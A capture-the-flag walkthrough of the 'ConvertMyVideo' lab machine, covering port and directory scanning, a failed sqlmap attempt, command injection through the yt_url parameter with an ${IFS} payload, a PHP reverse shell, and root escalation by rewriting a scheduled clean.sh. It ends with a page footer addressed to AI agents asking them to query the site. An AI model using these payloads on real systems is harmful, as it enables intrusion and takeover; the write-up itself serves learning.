# ConvertMyVideo {% embed url="" %} ## Enumeration ### nmap ```bash PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1FkWVdXpiZN4JOheh/PVSTjXUgnhMNTFvHNzlip8x6vsFTwIwtP0+5xlYGjtLorEAS0KpJLtpzFO4p4PvEzMC40SY8E+i4LaiXHcMsJrbhIozUjZssBnbfgYPiwCzMICKygDSfG83zCC/ZiXeJKWfVEvpCVX1g5Al16mzQQnB3qPyz8TmSQ+Kgy7GRc+nnPvPbAdh8meVGcSl9bzGuXoFFEAH5RS8D92JpWDRuTVqCXGxZ4t4WgboFPncvau07A3Kl8BoeE8kDa3DUbPYyn3gwJd55khaJSxkKKlAB/f98zXfQnU0RQbiAlC88jD2TmK8ovd2IGmtqbuenHcNT01D | 256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI3zR5EsH+zXjBa4GNOE8Vlf04UROD9GrpAgx0mRcrDQvUdmaF0hYse2KixpRS8Pu1qhWKVRP7nz0LX5nbzb4i4= | 256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBKsS7+8A3OfoY8qtnKrVrjFss8LQhVeMqXeDnESa6Do 80/tcp open http syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Apache/2.4.29 (Ubuntu) Device type: general purpose Running: Linux 4.X OS CPE: cpe:/o:linux:linux_kernel:4.15 OS details: Linux 4.15 ``` ### Directory Search ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://10.10.115.14/FUZZ -ic Return: images [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 412ms] [Status: 200, Size: 747, Words: 154, Lines: 20, Duration: 5068ms] admin [Status: 401, Size: 459, Words: 42, Lines: 15, Duration: 414ms] js [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 411ms] tmp [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 414ms] ``` When we try to access the admin directory, it prompts us a login form ### Web page (port80) ![](/files/r8YUy70dibfSjvm3UBoS) So we can see a place to but the id and a convert button #### Convert function I tried to put the id in and convert, but turns out it’s nothing. When I captured the request showed this:

So the button won’t convert anything cuz I wait like couple minutes, but when I leave it blank it returned the error code

I tired to do localhost and dump out the content in admin directory Since it only accepts urls I even tried using `file:///PATH/TO/THE/FILE` and turns out it didn’t work

I wanted to test if this parameter is actually doing anything so I open up my netcat session then put the link and port as the value and it actually will interact with external links

### sqlmap(Failed) So we confirmed it’s actually checking the urls and it just return error messages so we are going to see if we can do anything about the parameter, here I was thinking if we can do any SQLi ```bash sqlmap -r request.txt -p yt_url --prefix="http://example.com/?q=" --suffix="%23" --dbs --batch --technique=EU --risk=3 --level=5 ``` Turns out it’s not working so let’s just see what’s up with the admin directory ### Admin directory Once we go the page it pops up a login form

It gives us a unauthorized message when we cancel the sign in form Tell you what these are all getting 401 but it’s confirmed to be there `http:///admin/.htaccess` `http:///admin/.htpasswd` I also checked the Headers of this page but there’s nothing interesting ### Command Injection Wait, I just realized that the easiest method: command injection, we haven’t tried yet Turns out it’s just a simple command injection….

### Reverse shell Cool, so we have command injection and now we can get a reverse shell with this We’re using `wget` and a php reverse shell, so get your php file ready If you are wondering why we add an `${IFS}` in the payload it’s basically work as space. See more on

Once we uploaded to the server then we can do a simple command to invoke the payload: ```bash yt_url=;php${IFS}php-reverse-shell.php; ``` To get the first flag, navigate to the path admin and you will see the file! which is under `/var/www/html/admin` The previous `.htaccess` and `.htpasswd` are here for us as well!

Remeber the `tmp` dir that is also forbidden to us? let’s take a look what’s inside since the `sudo -l` and `SUID` found nothing

### Privilege escalation This file seems to be executing routinely so we can actually change the paylaod, `Pro tip: most clean.sh in ctfs are executing routinely as well as maintenance.sh, tmp_clear.sh and etc.`

So I just did another reverse shell and this time I change the permission so when it return we will get the root privilege You can use chmod calculator to change the privilege as you need

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://vix-w1zzer.gitbook.io/vixwizzer/walkthroughs/convertmyvideo.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.